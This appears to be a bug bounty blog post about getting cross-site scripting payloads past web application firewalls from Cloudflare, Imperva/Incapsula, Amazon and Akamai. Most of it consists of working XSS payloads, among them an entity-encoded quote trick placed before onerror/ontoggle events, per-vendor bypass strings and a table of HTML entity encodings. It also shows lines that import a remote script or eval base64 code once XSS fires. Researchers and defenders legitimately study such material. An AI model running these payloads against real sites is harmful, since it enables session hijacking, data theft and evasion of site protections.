When I started bug bounty, a major obstacle was the blocking of my XSS injections by WAFs.

So my quest was to find a “universally” effective payload, which works in most cases

At first I came across programs with cloudflare, although Cloudflare is reputable, it can be bypassed with a variety of payloads available on GitHub or Twitter. Here area few examples I’ve used in my tests.

A commonly used method is to prefix any JavaScript event with on

<img/ignored=()%0Asrc=x%0Aonerror=prompt(1)>
<svg onload=prompt%26%230000000040document.domain)>
<Img Src=On OnError=alert(1)>

My goal was to discover a js event bypass payload for use in XSS injections with double quotes in cases where you can’t reopen a tag, and of the classic tag injections.

" onerror[JS]
<img src=x onerror=[JS]>

During my search for the magic payload, i identified several possible injection points. However, most of the characters were blocked by WAFs because they were blacklisted. I looked at the left side of the events, I discovered that by adding a character before the JavaScript event name, the payload was accepted.

Description Status
The WAF blocks 403
The payload passes 200
The payload is syntactically valid Valid
The payload is syntactically invalid Invalid

onerror=[JS] Return 403 Valid
/onerror=[JS] Return 403 Valid
aonerror=[JS] Return 200 Invalid

So, I started thinking about quotes that can be concatenated with the event name :

<x ""onerror=[JS]>Return 200 Invalid
<x x="""onerror=[JS]>Return 200 Invalid
<x x=""onerror=[JS]>Return 403 Valid

When an odd number of quotes is used, it works, but it’s not valid because the quotes concatenate to the event name. I thought I’d try using entities, which are aliases for certain special characters. By replacing the middle quotes with an entity alias the payload is valid and bypasses WAFs !!!!!

🔥"&quot;“🔥

<x x="&quot;"onerror=[JS]>

Html entity are very usefull when the & character is not filtered. To my knowledge there are 3 types available :

' -> &apos;
" -> &quot;
` -> &grave;
` -> &DiacriticalGrave;
( -> &lpar;
) -> &rpar;
{ -> &lcub;
} -> &rcub;
& -> &amp;
< -> &lt;
> -> &gt;
\n -> &NewLine;
\t -> &Tab;
nbsp -> &nbsp;
\ -> &bsol;

' -> &#x27;
" -> &#x22;
` -> &#x60;
( -> &#x28;
{ -> &#x7b;
} -> &#x7d;
& -> &#x26;
< -> &#x3c;
> -> &#x3e;
\n -> &#x0a;
\t -> &#x09;
nbsp -> &#xa0;
\ -> &#x5c; 

' -> &#39;
" -> &#34;
` -> &#96;
( -> &#40;
) -> &#41;
{ -> &#123;
} -> &#125;
& -> &#38;
< -> &#60;
> -> &#62;
\n -> &#10;
\t -> &#9;
nbsp -> &#160;
\ -> &#92;

With the Numeric and Hex entity, what’s really handy is that you can add as many 0 as you like, often very poorly filtered.

" -> &#34; -> &#00000000000000000000000034; Numeric entity 
" -> &#x22; -> &#x000000000000000000000022; Hex entity

Personally, i quite often use it to load my script once xss has been detected, loading a remote script with import or performing a big base64 eval :

import&lpar;&#x27;https://example.com&#x27;&rpar;
eval&lpar;atob&lpar;&#x27;BASE64===&#x27;&rpar;&rpar;

back to the WAF bypass now on some wafs this payload works? I tried on the better-known ones I had in my scopes :

Imperva & Incapsula

Works perfectly for imperva and incapsula :

<details/open/id="&quot;"ontoggle=[JS]>

Amazon

It also works well for Amazon WAfs, Cloudfront

<details/open/id="&quot;"ontoggle=[JS]>

Akamai

For Akamai, I had to add other quotes for it to work

<details open id="' &quot;'"ontoggle=[JS]>



You can retrieve these payloads on my XSS bypass notes on github :
https://github.com/Edr4/XSS-Bypass-Filters